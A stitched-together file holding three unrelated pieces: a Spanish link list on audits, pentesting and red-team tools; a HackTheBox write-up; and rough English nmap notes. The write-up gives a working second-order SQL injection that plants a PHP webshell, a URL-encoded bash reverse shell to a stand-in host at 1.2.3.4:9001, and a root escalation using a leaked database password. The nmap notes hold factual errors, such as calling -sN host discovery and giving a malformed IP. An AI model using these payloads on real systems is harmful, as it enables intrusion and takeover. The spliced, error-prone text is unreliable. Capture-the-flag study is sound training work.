[scb-slack]: https://join.slack.com/t/securecodebox/shared_invite/enQtNDU3MTUyOTM0NTMwLTBjOWRjNjVkNGEyMjQ0ZGMyNDdlYTQxYWQ4MzNiNGY3MDMxNThkZjJmMzY2NDRhMTk3ZWM3OWFkYmY1YzUxNTU
[scb-license]: https://github.com/secureCodeBox/secureCodeBox/blob/master/LICENSE
[zap owasp project]: https://owasp.org/www-project-zap/
[zap github]: https://github.com/zaproxy/zaproxy/
[zap user guide]: https://www.zaproxy.org/docs/
[zap automation framework]: https://www.zaproxy.org/docs/desktop/addons/automation-framework/
|
# Auditorías y Pentesting
[[TOC]]
## Tipos de auditorías
Auditorías de Seguridad vs Auditoría de vulnerabilidades vs Pruebas de penetración
### Auditoría de Seguridad
Una auditoría de seguridad se puede describir como una evaluación sistemática de las defensas de la infraestructura de TI de su organización. Durante el transcurso de esta revisión, los auditores medirán lo bien o mal que sus protocolos de seguridad cumplen con una lista de criterios establecidos para validar su postura de seguridad.
Estas auditorías deben ser exhaustivas y realizarse de forma regular para proteger sus datos y activos digitales. Si se encuentra en una industria altamente regulada (banca, salud, defensa), participar en esta actividad también ayudará a su empresa a garantizar el cumplimiento con la normas exigidas.
### Evaluación de Vulnerabilidades (o Auditoría de vulnerabilidades)
Una evaluación de vulnerabilidades, sin embargo, analiza las vulnerabilidades en el sistema de información (a menudo utilizando herramientas automatizadas) pero no proporciona ninguna indicación de si las vulnerabilidades pueden explotarse o cuánto podría costarle a la empresa una brecha o un ataque de ransomware exitoso.
Este enfoque tiene limitaciones, ya que el software de escaneo de vulnerabilidades solo analiza su sistema basándose en vulnerabilidades comunes pasadas. Por tanto, si está realizando una evaluación de vulnerabilidades, es muy importante que el software esté actualizado.
### Pruebas de penetración
Las pruebas de penetración van más allá de las auditorías de seguridad y las evaluaciones de vulnerabilidades al intentar vulnerar su sistema como un atacante. En este escenario, el pentester intentará replicar los mismos métodos empleados por los atacantes para determinar si su infraestructura de TI podría resistir un ataque similar.
A menudo, las pruebas de penetración implicarán el uso de múltiples enfoques en conjunto para intentar vulnerar el sistema. Esto es muy efectivo ya que está simulando los mismos métodos empleados por los atacantes del mundo real.
Existen diferentes tipos de pruebas de penetración:
#### Pruebas de penetración externa
Las pruebas de penetración externas se centran en los sistemas expuestos públicamente en Internet o redes externas.
#### Pruebas de penetración interna
Las pruebas de penetración interna se enfocan en todos sus sistemas conectados a redes internas (no expuestos directamente en Internet).
#### Pruebas de penetración híbridas
Las pruebas de penetración híbrida aprovechan los ataques externos e internos para determinar si un enfoque combinado puede conducir a una brecha de seguridad.
Para llevar a cabo este tipo de pruebas de penetración, los auditores/pentesters podrán emplear tres enfoques durante los "ataques".
#### Pruebas de caja negra
Las pruebas de penetración de caja negra implican pruebas de penetración externas en las que el atacante no tiene conocimiento previo del sistema. Apuntarán a su red como lo haría cualquier atacante para intentar obtener acceso a su red interna.
Este enfoque simula ataques del mundo real y contribuye en gran medida a reducir los falsos positivos.
#### Pruebas de caja blanca
Las pruebas de penetración de caja blanca son lo opuesto a las pruebas de penetración de caja negra, ya que se proporcionará a los atacantes con un conocimiento detallado de la infraestructura de TI de la organización así como de la postura de seguridad actual. Esto podría implicar que conociesen:
* Código fuente del sistema de información
* Direcciones IP
* Entorno de red
* Sistema operativo (incluida la versión actual)
#### Pruebas de caja gris
El enfoque de prueba de caja gris encuentra un equilibrio entre las pruebas de caja negra y caja blanca. En este escenario, los atacantes tendrán algún conocimiento sobre la infraestructura interna y externa.
Esta simulación imita aquellos ataques en los que los atacantes (ya sea interna o externamente) acceden al sistema con privilegios de acceso restringido.
## Soluciones del CCN en materia de auditorías
- [ANA](https://www.ccn-cert.cni.es/soluciones-seguridad/ana.html). Carga los resultados de auditorías realizadas con otras herramientas y permite "gestionar" el ciclo de vida de las vulnerabilidades.
## Recursos generales Pentesting
Recursos generales:
- [Pentesting cheatsheet](https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/7-part-100-article/Pentesting%20Cheatsheet22.pdf)
- [Red Teaming Toolkit Collection](https://0xsp.com/offensive/red-teaming-toolkit-collection)
- [346 consejos para RedTeams](https://vincentyiu.com/red-team-tips)
- [Compilación de recursos de todo tipo](https://github.com/scspcommunity/Cyber-Sec-Resources)
- [10 formas de atacar el mecanismo de reseteo de contraseñas](https://www.anugrahsr.me/posts/10-Password-reset-flaws/)
- [Recopilatorio enlaces Penetration Testing](https://www.hackingarticles.in/penetration-testing/) Muchísimos enlaces.
- [Password Dumping Cheatsheet: Windows](https://www.hackingarticles.in/password-dumping-cheatsheet-windows/)
- [MEGA mapa mental sobre pentesting](https://raw.githubusercontent.com/dsopas/assessment-mindset/master/assessment-mindset.png)
- [Chuleta interactiva sobre herramientas ofensivas](https://wadcoms.github.io/)
- [Lista de payloads para Metasploit](https://www.infosecmatter.com/list-of-metasploit-payloads-detailed-spreadsheet/)
## Auditorías/Pentesting según tecnología
### Descubrimiento
- [NetblockTool: The Easy Way to Find IP Addresses Owned by a Company](https://blog.netspi.com/netblocktool/)
- [Recursos y herramientas para el descubrimiento de subdominios](https://www.hackplayers.com/2017/02/recopilatorio-para-descubrimiento-subdominios.html)
### Buscadores para hacking
- [censys.io](http://censys.io)
- [shodan.io](http://shodan.io)
- [shodan.io for pentesters](https://www.defcon.org/images/defcon-18/dc-18-presentations/Schearer/DEFCON-18-Schearer-SHODAN.pdf)
- [viz.greynoise.io](http://viz.greynoise.io)
- [zoomeye.org](http://zoomeye.org)
- [onyphe.io](http://onyphe.io)
- [wigle.net](http://wigle.net)
- [intelx.io](http://intelx.io)
- [fofa.so](http://fofa.so)
- [hunter.io](http://hunter.io)
- [zorexeye.com](http://zorexeye.com)
- [pulsedive.com](http://pulsedive.com)
- [netograph.io](http://netograph.io)
- [vigilante.pw](http://vigilante.pw)
- [pipl.com](http://pipl.com)
- [abuse.ch](http://abuse.ch)
- [maltiverse.com/search](http://maltiverse.com/search)
- [insecam.org](http://insecam.org)
### Escaneo de Vulnerabilidades
- [Vulnerability Scanning Tools List](https://owasp.org/www-community/Vulnerability_Scanning_Tools)
- [OpenVAS](https://www.openvas.org/)
- [Usando OpenVAS](http://www.reydes.com/d/?q=Escaneo_de_Vulnerabilidades_Externo_utilizando_OpenVAS)
- [Cómo instalar OpenVAS en Kali Linux 2020](https://www.solvetic.com/tutoriales/article/8278-como-instalar-openvas-en-kali-linux/)
- [Actualizando OpenVAS](http://kinomakino.blogspot.com/2020/11/openvas-i-hate-you-and-i-love-you.html)
- [Nessus](https://en.wikipedia.org/wiki/Nessus_(software))
- [Usando Nessus + Metasploit](https://blog.isecauditors.com/2019/12/como-combinar-nessus-con-metasploit.html)
- [Nmap](https://nmap.org/)
- [Ejemplo de uso](https://www.redeszone.net/seguridad-informatica/nmap/)
- [Mapa mental nmap](https://nmap.org/docs/nmap-mindmap.pdf)
- [Nmap cheatsheet](https://www.dropbox.com/s/t853ac9c9s41mqx/nmap_cheet_sheet_v7.pdf)
- [Nmap for pentester](https://github.com/Ignitetechnologies/Nmap-For-Pentester)
- [Nikto](https://cirt.net/Nikto2)
- [Ejemplo de uso](http://www.reydes.com/d/?q=Escanear_un_Servidor_Web_utilizando_Nikto)
- [Flan Scan](https://github.com/cloudflare/flan)
- [Escaners para CMS](https://www.infosecmatter.com/cms-vulnerability-scanners-for-wordpress-joomla-drupal-moodle-typo3/) 12 escaners para WordPress, Joomla, Drupal, Moodle, Typo3 y similares.
- [Vulmap - Web Vulnerability Scanning And Verification Tools](https://www.kitploit.com/2020/12/vulmap-web-vulnerability-scanning-and.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+PentestTools+(PenTest+Tools)&m=1)
### Network pentesting
- [Network Pivoting and Tunneling Guide](https://catharsis.net.au/blog/network-pivoting-and-tunneling-guide/)
- [State of the art of network pivoting in 2019](https://blog.raw.pm/en/state-of-the-art-of-network-pivoting-in-2019/)
- [Router Penetration Testing](https://www.hackingarticles.in/router-penetration-testing/)
- [Recopilatorio network pentesting](https://guif.re/networkpentest) por [@guifreruiz](https://twitter.com/guifreruiz)
### Auditorías de aplicaciones web
- [OWASP Top Ten](https://owasp.org/www-project-top-ten/)
- [OWASP Web Security Testing Guide](https://owasp.org/www-project-web-security-testing-guide/)
- [Aplicación insegura para probar OWASP](https://owasp.org/www-project-juice-shop/)
Herramientas:
- [Tools](https://hackr.io/blog/top-10-open-source-security-testing-tools-for-web-applications) 19 herramientas opensource para pentesting de aplicaciones web
- [Usando ZAP](https://medium.com/volosoft/running-penetration-tests-for-your-website-as-a-simple-developer-with-owasp-zap-493d6a7e182b) para auditar la seguridad de una web
- [Web Application Security Recon Automation Framework](https://www.kitploit.com/2020/11/reconnote-web-application-security.html?m=1)
Recursos interesantes:
- [OWASP Top Ten explicado de forma interactiva](https://www.hacksplaining.com/lessons)
- [Recopilatorio de ataques web](https://github.com/swisskyrepo/PayloadsAllTheThings)
- [Big List of Naughty Strings](https://github.com/minimaxir/big-list-of-naughty-strings) - The Big List of Naughty Strings is an evolving list of strings which have a high probability of causing issues when used as user-input data. This is intended for use in
helping both automated and manual QA testing.
- [XSS Payload list](https://github.com/payloadbox/xss-payload-list)
- [WebSecurity Academy](https://portswigger.net/web-security) Formación online gratuita de los creadores de Burp Suite.
- [Burp Suite vs OWASP ZAP](https://jaw33sh.wordpress.com/2020/11/22/burp-suite-vs-owasp-zap-a-comparison-series/)
- [Burp Suite for Pentester](https://github.com/Ignitetechnologies/BurpSuite-For-Pentester)
- [Hacker101](https://www.hacker101.com/) CTFs + Vídeos de formación sobre hacking web.
- [Recopilatorio web pentesting](https://guif.re/webpentest) por [@guifreruiz](https://twitter.com/guifreruiz)
- [Recopilatorio enlaces Web Penetration Testing](https://www.hackingarticles.in/web-penetration-testing/) Muchísimos enlaces.
- [Mapa mental ataques SSRF](https://raw.githubusercontent.com/hackerscrolls/SecurityTips/master/MindMaps/SSRF.png)
- [Blind SSRF](https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/)
### Auditorías de servicios Cloud
Recursos generales:
- [Penetration Tester's Guide to Evaluating OAuth 2.0](https://maxfieldchen.com/posts/2020-05-17-penetration-testers-guide-oauth-2.html)
#### Auditorías AZURE
- [2020. AZURE AD INTRODUCTION FOR RED TEAMERS](https://www.synacktiv.com/en/publications/azure-ad-introduction-for-red-teamers.html)
- [2020. Lateral Movement in Azure App Services](https://blog.netspi.com/lateral-movement-azure-app-services/)
- [2020. Azure File Shares for Pentesters](https://blog.netspi.com/azure-file-shares-for-pentesters/)
- [Attacking Azure, Azure AD, and Introducing PowerZure](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a)
- [Abusing Azure AD SSO with the Primary Refresh Token](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/)
- [Azure Cloud Penetration Testing](https://dl.packetstormsecurity.net/papers/general/azure-pentest.pdf)
- [Journey to Azure AD PRT: Getting access with pass-the-token and pass-the-cert](https://o365blog.com/post/prt/#creating-your-own-prt)
- [Bypassing conditional access by faking device compliance](https://o365blog.com/post/mdm/)
- [AADinternals](https://o365blog.com/aadinternals/#installation) Módulo powershell para pentesting contra Azure AD.
- [MicroBurst: A PowerShell Toolkit for Attacking Azure](https://github.com/NetSPI/MicroBurst)
- [PowerZure](https://github.com/hausec/PowerZure) PowerShell project created to assess and exploit resources within Microsoft’s cloud platform, Azure
- [Recopilatorio enlaces Azure Security](https://github.com/kmcquade/awesome-azure-security)
- [Atacando Azure: qué herramientas utilizar en función de qué rol tengas en Azure](https://o365blog.com/aadkillchain/)
#### Auditorías AWS
- [Hacking the Cloud. AWS](https://hackingthe.cloud/aws/)
- [AWS pentesting essential guide](https://www.virtuesecurity.com/aws-penetration-testing-essential-guidance/)
### Auditorías Dockers
- [Docker for pentesters](https://blog.ropnop.com/docker-for-pentesters/)
- [Herramientas para escanear y auditar seguridad contenedores Docker](https://blog.elhacker.net/2021/03/herramientas-para-escanear-y-auditar-seguridad-vulnerabilidades-contenedores-docker.html?m=1)
### Auditorías Kubernetes
- [Kubernetes Pentest Methodology](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1)
### Auditorías de Directorio Activo
Recursos interesantes:
- [2021. Windows & Active Directory Exploitation Cheat Sheet and Command Reference](https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/)
- [2021. Attacking Active Directory](https://zer1t0.gitlab.io/posts/attacking_ad/)
- [2020. Securing Active Directory: Performing an Active Directory Security Review](https://www.hub.trimarcsecurity.com/post/securing-active-directory-performing-an-active-directory-security-review)
- [2020 - Atacando el Directorio Activo](https://rmusser.net/docs/Active_Directory.html#adattack)
- [Active Directory Exploitation Cheat Sheet](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet/blob/master/README.md)
- [Active Directory Exploitation](https://twitter.com/CyberWarship/status/1309127376283013120?s=20)
- [An Offensive Kerberos Overview](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61)
- [Mapa mental para explotar el directorio activo](https://i.ibb.co/TKYNCNP/Pentest-ad.png)
- [12 charlas sobre cómo atacar el directorio activo en TroopersCON19](https://www.youtube.com/playlist?list=PL1eoQr97VfJnvOWo_Jxk2qUrFyB-BJh4Y)
- [2019. Pentesting Active Directory Forests. Carlos García Ciyi](https://www.youtube.com/watch?v=6aV5tZlQ2EQ)
- [2019. Bloodhound](https://en.hackndo.com/bloodhound/) Herramienta para visualizar el directorio activo como un grafo.
- [2019. En qué consiste un ataque "Pass the hash"](https://en.hackndo.com/pass-the-hash/)
- [2018. Pentesting Active Directory. Carlos García Ciyi](https://www.youtube.com/watch?v=-8HTqAxppEc)
- [FIREEYE. 2020. Atacando el directorio activo](https://www.fireeye.com/blog/threat-research/2020/08/hands-on-introduction-to-mandiant-approach-to-ot-red-teaming.html)
- [Active Directory Kill Chain Attack & Defense](https://github.com/infosecn1nja/AD-Attack-Defense/blob/master/README.md)
- [2016. Atacando LAPS](https://secureidentity.se/recover-laps-passwords/)
- [Atacando WSUS](https://www.gosecure.net/blog/2020/09/03/wsus-attacks-part-1-introducing-pywsus/)
"Writeups" o soluciones a retos de hacking sobre Directorio Activo:
- [Forest: A walk through in hacking active directory](https://rootsecdev.medium.com/forest-a-walk-through-in-hacking-active-directory-c83ecb21e1a9)
### Auditorías de aplicaciones móviles
Recursos interesantesg:
- [Mobile Application Security Testing Distributions](https://hackersonlineclub.com/mobile-security-penetration-testing/)
- [OWASP Mobile Security Testing Guide](https://owasp.org/www-project-mobile-security-testing-guide/)
- [Where to find the OWASP Mobile Top 10 Vulnerabilities](https://github.com/scspcommunity/Cyber-Sec-Resources/blob/master/Misc%20Content%20By%20SCSP/Where%20to%20find%20the%20OWASP%20Mobile%20Top%2010%20Vulnerabilities.pdf)
- [The Top 5 Most Common Mobile App Security Flaws](https://www.allysonomalley.com/2020/06/23/the-top-5-most-common-mobile-app-security-flaws/)
- [Recopilatorio mobile security](https://guif.re/mobilesec) por [@guifreruiz](https://twitter.com/guifreruiz)
#### Android
Lista de recursos:
- [Recopilatorio enlaces Android Security](https://github.com/saeidshirazi/awesome-android-security)
- [Intercepting HTTPS on Android](https://httptoolkit.tech/blog/intercepting-android-https/)
- [App Android vulnerable](https://github.com/rewanth1997/Damn-Vulnerable-Bank)
- [Android Penetration Testing](https://github.com/Ignitetechnologies/Android-Penetration-Testing)
#### IOS
![IOS Vulnerability Assesment](./img/ios-pentesting.jpg)
- [iOS Pentesting Tools Part 1: App Decryption and class-dump](https://www.allysonomalley.com/2018/08/10/ios-pentesting-tools-part-1-app-decryption-and-class-dump/)
- [iOS Pentesting Tools Part 2: Cycript](https://www.allysonomalley.com/2018/12/13/ios-pentesting-tools-part-2-cycript/)
- [iOS Pentesting Tools Part 3: Frida and Objection](https://www.allysonomalley.com/2018/12/20/ios-pentesting-tools-part-3-frida-and-objection/)
- [iOS Pentesting Tools Part 4: Binary Analysis and Debugging](https://www.allysonomalley.com/2019/01/06/ios-pentesting-tools-part-4-binary-analysis-and-debugging/)
- [iOS Bug Hunting – Web View XSS](https://www.allysonomalley.com/2018/12/03/ios-bug-hunting-web-view-xss/)
- [Pentesting en aplicaciones IOS](https://www.youtube.com/watch?v=1zk6aC3xxhU) por [Miguel Angel Arroyo](https://twitter.com/miguel_arroyo76)
### Auditorías WIFI
- [WIFI Hacking Cheatsheets](https://github.com/koutto/pi-pwnbox-rogueap/wiki) Teoría sobre hacking WIFI, comandos
- Mapa mental sobre WIFI Hacking [PNG](https://raw.githubusercontent.com/koutto/pi-pwnbox-rogueap/main/mindmap/WiFi-Hacking-MindMap-v1.png) [PDF](https://github.com/koutto/pi-pwnbox-rogueap/raw/main/mindmap/WiFi-Hacking-MindMap-v1.pdf)
<!-- ![IMG](./img/wifi-hacking-mindmap.png) -->
## Bug Bounties
Un "Bug Bounty" es un "trato" ofrecido por muchos sitios web, organizaciones y desarrolladores de software mediante el cual los investigadores pueden recibir reconocimiento y compensación por informar de errores, especialmente aquellos relacionados con vulnerabilidades de seguridad.
Estos programas permiten a los desarrolladores descubrir y resolver errores antes de que el público en general los conozca, evitando su abuso por parte de actores maliciosos. En los últimos años, un gran número de organizaciones han implementado programas de "Bug Bounty".
Es destacable que organizaciones tradicionalmente conservadoras, como el Departamento de Defensa de los Estados Unidos, han comenzado a utilizar "Bug Bounties" (véase ["Hack the Pentagon"](https://www.hackerone.com/hack-the-pentagon) o [Hack the Air Force](https://www.hackerone.com/press-release/us-department-defense-concludes-third-hack-air-force-bug-bounty-challenge-hackerone)). Se trata de un cambio de posición importante ya que, históricamente, este tipo de organizaciones eran mas proclives a amenazar a los investigadores con demandas legales en lugar de incentivarles a participar en estos programas como parte de una política de divulgación de vulnerabilidades integral.
- [Lista de Bug Bounties en HackerOne](https://hackerone.com/bug-bounty-programs)
- [Bug Bounty hunter](https://www.bugbountyhunter.com/) Recursos generales.
- [Bug Bounty cheatsheet](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md)
## Concursos para "revelar" vulnerabilidades "owneando" productos
- [Pwn2Own](https://en.wikipedia.org/wiki/Pwn2Own)
## Ejercicios ReadTeam
Un ejercicio RedTeam vs BlueTeam es una técnica de evaluación de la ciberseguridad que utiliza ataques simulados para medir la fortaleza de las capacidades de seguridad existentes de la organización e identificar áreas de mejora en un entorno de bajo riesgo.
Siguiendo el modelo de ejercicios de entrenamiento militar, este simulacro es un enfrentamiento entre dos equipos de profesionales de ciberseguridad altamente capacitados: un equipo rojo que utiliza técnicas de adversario del mundo real en un intento de comprometer el entorno, y un equipo azul que consta de personal de respuesta a incidentes que trabaja dentro de la unidad de seguridad para identificar, evaluar y responder a la intrusión.
Estos ejercicios ayudan a las organizaciones a:
- Identificar puntos vulnerables en lo que respecta a personas, tecnologías y sistemas.
- Determinar áreas de mejora en los procesos defensivos de respuesta a incidentes en cada fase de la cadena de eliminación.
- Desarrollar la experiencia de primera mano de la organización sobre cómo detectar y contener un ataque dirigido
- Desarrollar actividades de respuesta y remediación para devolver el entorno a un estado operativo normal.
- [Recopilatorio enlaces RedTeam](https://www.hackingarticles.in/red-teaming/)
- [Mas enlaces sobre herramientas RedTeam](https://cyberarch.eu/red-teaming-adversary-simulation-toolkit/)
### Threat Emulation
- [Comparing open source adversary emulation platforms for red teams](https://redcanary.com/blog/comparing-red-team-platforms/)
- [Which C2 framework is best for you?](http://ask.thec2matrix.com/)
- [CALDERA](https://github.com/mitre/caldera) CALDERA™ is a cyber security framework designed to easily run autonomous breach-and-simulation exercises. It can also be used to run manual red-team engagements or automated incident response.
- [Atomic Red Team](https://github.com/redcanaryco/atomic-red-team)
- [Mordor](https://github.com/OTRF/mordor)
- [Testing adversary technique variations with AtomicTestHarnesses](https://redcanary.com/blog/introducing-atomictestharnesses/?utm_source=twitter&utm_medium=social&utm_campaign=blog)
- [Leonidas](https://www.kitploit.com/2020/11/leonidas-automated-attack-simulation-in.html?m=1) Automated Attack Simulation In The Cloud, Complete With Detection Use Cases
- [Run your Microsoft 365 Defender attack simulations](https://github.com/MicrosoftDocs/microsoft-365-docs/blob/public/microsoft-365/security/mtp/mtp-pilot-simulate.md)
- [Cobalt Strike](https://www.cobaltstrike.com/)
- [Varios cursos sobre operaciones con CobalStrike](https://www.cobaltstrike.com/training)
- [Empire](https://github.com/EmpireProject/Empire)
- [Metasploit](https://github.com/rapid7/metasploit-framework)
- [Chuleta sobre Metasploit](https://www.comparitech.com/fr/net-admin/metasploit-cheat-sheet/)
- [Otra chuleta sobre Metasploit](https://blog.underc0de.org/cheat-sheet-metasploit-framework/)
- [Curso Metasploit](https://www.offensive-security.com/metasploit-unleashed/)
- [Infection Monkey](https://www.guardicore.com/infectionmonkey/) Open source Breach and Attack Simulation (BAS) tool that assesses the resiliency of private and public cloud environments to post-breach attacks and lateral movement.
## OSINT
- [Enlaces a Herramientas OSINT por Ciberpatrulla](https://ciberpatrulla.com/links/)
- [Recopilatorio enlaces OSINT](https://start.me/p/DPYPMz/the-ultimate-osint-collection)
## Retos del tipo Capture the Flag (CTFs)
Lista de CTFs con orientación ofensiva (red):
- [Recopilatorio de CTFs](https://github.com/michelbernardods/labs-pentest)
- [HackTheBox](https://www.hackthebox.eu/)
- [Practice CTF List](https://captf.com/practice-ctf/)
- [Archive OOO](https://archive.ooo)
- [Pwnable.kr](http://pwnable.kr/)
- [Pwnable.tw](https://pwnable.tw/)
- [CTFLearn](https://ctflearn.com/)
- [Root Me](https://www.root-me.org/)
- [Hacking Lab](https://hacking-lab.com/index.html)
- [Microcorruption](https://microcorruption.com/)
- [Crackmes.one](https://crackmes.one/)
- [Ringzer0ctf](https://ringzer0ctf.com/)
- [Domgo](https://domgo.at/cxss/intro)
- [Tryhackme](https://tryhackme.com/)
- [CTFChallenge](https://ctfchallenge.co.uk/)
- [Cryptohack](https://cryptohack.org/)
- [Hack.me](https://hack.me/)
- [CTFSites](https://ctfsites.github.io/)
Lista de "writeups" (soluciones) en CTFs ofensivos:
- [CTF Challenges](https://www.hackingarticles.in/ctf-challenges-walkthrough/). Cientos de ellos...
- [CTF Writeups](https://medium.com/ctf-writeups)
- [HackTheBox writeups](https://hackso.me/)
Lista de "writeups" (soluciones) en BugBounties:
- [+1500 List of bug bounty writeups](https://pentester.land/list-of-bug-bounty-writeups.html)
- [Top 25 XXE bug bounty reports](https://corneacristian.medium.com/top-25-xxe-bug-bounty-reports-ab4ca662afad)
|
> Author: **[ippsec][author-profile]**!
Ippsec sensei said it all in his [video][walkthrough-ippsec], so this WU will
be concise.
## Discovery
### Port scanning
```bash
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
| 256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_ 256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.48 (Debian)
5000/tcp filtered upnp
5001/tcp filtered commplex-link
5002/tcp filtered rfe
5003/tcp filtered filemaker
5004/tcp filtered avt-profile-1
8080/tcp open http nginx
```
### Web browsing
The website lands on a registration page:
![][registration]
Upon submission, it redirects to `/account.php`:
```bash
HTTP/1.1 302 Found
Date: Thu, 16 Sep 2021 06:08:02 GMT
Server: Apache/2.4.48 (Debian)
X-Powered-By: PHP/7.4.23
Set-Cookie: user=cc705c9428384a563c68624e97491bb2
Location: /account.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
```
And the account page displays all the users in the same country. Since the
request doesn't contain any data apart from the cookie, it must use it to
fetch the session / user data from some database.
Submiting the registration form with the same username and another country
displays the former input. Ie the server doesn't update its record and loads
the user data already in the DB:
![][no-update-on-account]
## Break-in
It's possible to submit a custom country:
```html
<!-- username=a&country=foo -->
<h1 class="text-white">Welcome a</h1><h3 class="text-white">Other Players In foo</h3><li class='text-white'>apehex</li>
```
So we try injecting a SQL statement:
```html
<h1 class="text-white">Welcome c</h1>
<h3 class="text-white">Other Players In ' UNION SELECT 1;-- -</h3>
<li class='text-white'>1</li>
```
The `<h3>` tag shows that the query is stored verbatim in the DB, but evaluated
on the second query, when the server retrieves the list of users.
This is a second order SQLi, another lesson from **[iipsec][author-profile]**!
So we register yet another user with a webshell:
```
username=d&country=' UNION SELECT '<?php $c=chr(99);system($_REQUEST[$c]); ?>' INTO OUTFILE '/var/www/html/shell.php';-- -
```
Now we can create a functional reverse shell from the page `/shell.php`:
```
c=%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%2e%32%2e%33%2e%34%2f%39%30%30%31%20%30%3e%26%31%27
```
## Escalation
The database itself contains only user data, but the root password is stored in
the config file:
```bash
cat config.php
# <?php
# $servername = "127.0.0.1";
# $username = "uhc";
# $password = "uhc-9qual-global-pw";
# $dbname = "registration";
# $conn = new mysqli($servername, $username, $password, $dbname);
# ?>
su -
```
[author-profile]: https://app.hackthebox.eu/users/3769
[no-update-on-account]: images/no-update-on-account.png
[registration]: images/registration.png
[walkthrough-ippsec]: https://www.youtube.com/watch?v=UqoVQ4dbYaI
|
## Nmap
### Objectives
- Nmap commands structure
- host discovery
- how nmap scanning works
- target
- ports
- scan type
- scan status
- scan timings
- output formats
- nmap script engine
- service detection
- os detection
- timeout & host delay
### Basics
**Requriements**:
1. ip
2. port \[default\]
3. scan type [default]
4. scan timings [default]
5. output types [default]
subnet(CIDR): if you want to scan whole network.
you give subnet.
### host discovery
to check system is alive or shutdown.
```
nmap <ip address or subnet (192.168.1.1/24) #scan all host machine is in network>
nmap -sN 192.169.1.1 # -sN is by default if you don'r give then also it starting doing host discovery
nmap 192.168.1.1 # default
```
#### how does it work
- root user
- ICMP echo request
- TCP SYN - port 443
- TCP ACK - port 80
- ICMP T.S request
- local user
- SYN - port 443
- ACk - port 80
if you don't want to do host discovery
```bash
nmap -Pn 192.168.1.1
```
### how scanning works
**port open (3-way handshake)**
`Machine A` sends **SYN packet** to Machine B (Machine A wants to connect to Machine B)
`Machine B` then sends **SYN & ACK packet** in return (Machine B accept the connection request)
`Machine A` then sends **ACK packet** (Machine A will connected successfully to Machine B)
**port closed**
`Machine A` sends **SYN packet** to `Machine B`
`Machine B` sends **RST & ACK packet** to `Machine A` (RST flag [reset flag] Machine B port is closed)
RFC: request for commits all response of protocol
nmap using this rules book.
### Target
1. single ip
```
nmap 192.168.1.1
```
2. subnet range
```
nmap 192.168.0.0/24
# all host machine in network
```
3. ip range
```
nmap 192.168.1.1-5
```
4. specific ips
```
nmap 192.168.1.6 192.168.1.4
```
5. text file
```
nmap -iL hostmachines.txt
```
6. domain
```
nmap domainname.com scanme.nmap.org
```
by default 1000 ports are scan
### ports
```
nmap 192.168.1.1 <port>
```
1. single port
```
nmap 1921.168.1.1 -p 80
```
2. sequence port (range)
```
nmap 192.168.1.1 -p20-80
```
3. distrubuted port only
```
nmap 192.168.1.1 -p80, 22, 21
```
4. service specific
```
nmap 192.168.1.1 -p http # <service>
```
5. protocol specific
```
nmap 192.168.1.1 -p T:22, U:53 # T(TCP):<port number> and U(UDP): <port number>
```
6. all ports
```
nmap 192.168.1.1 -p- # total ports: 65535
```
7. top port
```
nmap 192.168.1.1 --top-ports 100
```
### scan techniques
- TCP connect scan `-sT`
- TCP SYN scan `-sS`
- FIN scan `-sF`
- xmas scan `-sX`
- null scan `-sN`
- ping scan `-sP`
- UDP scan `-sU`
- ACK scan `-sA`
1. TCP connect scan: `Machine A` will sends **SYN packet** to `Machine B`
`Machine B` will reply with **SYN & ACK packets** to `Machine A`
`Machine A` will then reply with **ACK & RST packets** to `Machine B` (machine A want to closed the connection with RST(reset) flag)
you need root privilieges
2. TCP SYN scan/ stealth scan: `Machine A`
will sends SYN packet
Machine B will sends **SYN & ACK packets** to Machine A (machine B wants to connect)
Machine A will sends RST flag after receiving **SYN packet**
3. UDP scan: on based of ICMP reply nmap decide the port is open or closed
4. ACK scan: Firewall is blocking the packets if finds suspiuious or finds in rileset to block the request, resulting in
no reply, so nmap can't be sure port is open/closed/filtered
ACK scan helps to finds the firewall enabled or not and rule set.
### scan status
- open
- close
- filtered
- open filtered
- close filtered
- unfiltered
#### open
Machine A sends **SYN packet** to Machine B
Machine B reply with **SYN + ACK packets** To Machine A
Nmap detect that port is open, because Machine A receive SYN + ACK packet from Machine B.
#### closed
Machine A sends **SYN packet** to Machine B
Machine B reply with **RST + ACK packet**.
Machine B has closed port so sends RST + ACK flag.
```
# root user / superuser
sudo nmap -p 3389,22 scanme.nmap.org
# 22 open ssh
# 3389 closed ms-wbt-server
```
Machine A with root privilieges sends ping request, SYN - 443, ACK - 80, timestamp request and SYN packet to 3389, 22
Machine B reply with ping reply, timestamp reply, RST + ACK flag on 443, RST flag on 80, and RST + ACK on 3389, SYN + ACK on 22
Machine A sends RST flag on port 22.
```bash
# local user / regular user
nmap -p 3389,22 scanme.nmap.org
# 22 open ssh
# 3389 closed ms-wbt-server
```
**host discovery**
Machine A sends SYN port 80 and SYN port 443
Machine B reply with RST + ACK on port 443 means closed, and SYN + ACK on 80 means open port
Machine A sends ACK, RST + ACK on 80 closed tyhe connection
**request for 3389 and 22 ports**
Machine A sends SYN on port 3389, 22
Machine B reply with SYN + ACK on 22 means open and
Machine A sends ACk on 22
Machine B reply with RST + ACK on 3389
